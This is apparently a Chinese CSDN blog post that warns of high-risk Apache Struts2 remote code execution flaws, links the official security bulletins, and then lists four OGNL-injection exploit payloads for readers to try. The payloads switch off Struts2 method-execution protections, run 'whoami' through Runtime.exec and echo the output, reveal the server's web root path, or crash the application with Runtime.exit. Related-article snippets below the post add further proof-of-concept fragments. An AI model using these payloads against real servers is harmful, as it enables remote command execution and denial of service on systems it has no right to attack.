高危 struts2 远程执行代码漏洞

最新推荐文章于 2019-10-21 10:18:22 发布
最新推荐文章于 2019-10-21 10:18:22 发布
阅读量339 收藏
点赞数
分类专栏: struts2 远程执行漏洞 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wu_xian_jun/article/details/84450341
版权
用struts2 的童鞋主意了,最近出了几个比较严重的安全漏洞,危害及大。没补丁的童鞋赶快补丁,服务器会被别人日了。
下面公布几个exp 有兴趣的童鞋可以去测试下,不懂的可以联系俺,共同探讨下。说不定还能发现0day.

15个漏洞及补丁自己去官网看:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

exp1: 

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1



exp 2: 

?class.classLoader.jarPath=(%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]


exp3: 

1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23k8out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23k8out.println(%23req.getRealPath("/")),%23k8out.close())}


exp4: 

${%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d new java.lang.Boolean(false)%2c %23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c %23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew java.io.InputStreamReader(%23a)%2c%23c%3dnew java.io.BufferedReader(%23b)%2c%23d%3dnew char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()}
wu_xian_jun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 824
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
struts2 框架 远程执行漏洞 解决方案详解
mayongmsss的专栏
06-03 1028
Struts2/XWork 该漏洞是利用xwork(struts2的核心部件)可以动态构建执行方法的原理(xwork.MethodAccessor.denyMethodExecution), 通过修改一些值能够调用被保护的Java代码,并且执行任意的Java代码:如执行下述代码,将会调用:java.lang.Runtime.getRuntime().exit(1),造成程序运行异常; ht
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
鬼哥struts2测试工具.exe
01-03
鬼哥struts2测试工具.exe
Struts 2 远程代码执行漏洞加固方法
zephyr的专栏
09-04 911
加固方式如下:     通过判断Content-Type头是否为白名单类型,来限制非法Content-Type的攻击。 加固代码: import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; impor
struts2漏洞利用工具
07-03
然而,Struts2在历史上曾出现过一系列的安全漏洞,其中一些是高危的,允许攻击者执行远程代码或控制系统。这个"Struts终极漏洞利用工具"显然旨在帮助安全研究人员和管理员检测和测试Struts2应用是否存在这些已知漏洞...
Struts 2 全版本漏洞检测工具
最新发布
03-19
Struts 2漏洞检查工具2018版.exe文件是一个Windows操作系统下的可执行程序,用于在本地或者远程服务器上运行漏洞扫描。使用这类工具时,通常需要具备一定的系统访问权限,并且理解扫描结果,以便及时采取措施修复...
Struts2漏洞检查工具
02-14
然而,由于其广泛使用,Struts2框架在过去曾曝出多个安全漏洞,这些漏洞可能导致远程代码执行、数据泄露等严重后果。因此,针对Struts2的安全检查和漏洞利用工具变得至关重要。 首先,我们需要理解什么是Struts2...
Struts2高危漏洞2.3.15.3
03-15
在2017年,Struts2被发现存在一个名为CVE-2017-9791的高危漏洞,该漏洞可能导致远程代码执行(RCE),从而使攻击者能够控制服务器,窃取敏感信息,甚至导致服务瘫痪。针对这个漏洞Struts2官方发布了修复版本2.3....
Struts2漏洞检查工具最新版.rar
08-26
例如,著名的S2-045、S2-048和S2-057等都是Struts2框架历史上的高危漏洞,它们可能导致远程代码执行(RCE)、命令注入、信息泄露等问题,严重威胁到服务器的安全。 该2018版的Struts2漏洞检查工具可能包含了以下...
struts2远程命令执行漏洞S2-045
weixin_33755557的博客
03-07 603
Apache Struts2最新漏洞(CVE-2017-5638,S02-45) struts2远程命令执行漏洞S2-045 Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵,漏洞评级为:高危漏洞详情:恶意用户可在上传文件时通过修...
0x26.Apache Struts2远程代码执行漏洞(S2-019)复现
qq_31679787的博客
10-21 898
s2-019:动态方法调用是一种已知会施加可能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭; 构造poc: ?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set...
struts2漏洞批量检查
oscarli的博客
11-21 5511
检查代码来自 Lucifer。#!/usr/bin/env python # coding=utf-8 # code by Lucifer # Date 2017/10/12 import sys import base64 import warnings import requests from termcolor import cprint warnings.filterwarnings("
Apache Struts2(S2-046)漏洞预警
热门推荐
煜铭2011
03-21 1万+
0x00 前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Contro
漏洞复现:Struts2 远程代码执行漏洞(S2-033)
weixin_33752045的博客
01-04 304
docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033 EXP: http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBE...
struts2漏洞版本升级过程
fixed_star_2007的博客
06-15 219
原文来自:http://www.blogjava.net/ldwblog/archive/2013/10/14/404944.html   struts2出现的漏洞以及影响:http://www.iteye.com/news/28053#commentshttp://baike.baidu.com/link?url=6-45Efjxfsz2J74shu4sfd9G4ASrYig3ovFgBZ...
Struts2远程命令执行漏洞分析
南方少年的专栏
03-19 670
[size=large]貌似一夜之间struts热乎起来了,各种工具利用代码网络上到处都是。今天livers为大家带来了当前页面实现交互的shell的利用代码分析,感觉非常不错,于是乎转来与大家一起学习下。以下为原文: 大牛们不要见笑。 新的exp 构造的很精巧 以POST的方式提交绕过对输入参数的部分过滤。 ('\43_memberAccess.allowStaticMe...
struts2远程执行
..7a.
10-19 2621
Struts2的核心是使用的webwork框架,而webwork又是使用的XWork来处理action的,并且通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: user.address.city=Bishkek&user['favoriteDrink']=kumys ONGL将它转
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2014
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
移动应用漏洞案例1
08-08
在移动应用漏洞案例中,某视频客户端存在高危漏洞,导致低版本远程代码执行漏洞。这个漏洞最终的情况是在非root的设备上,攻击者发送一个intent,从而控制整个客户端,包括获取任意机密数据和执行相应逻辑等。漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值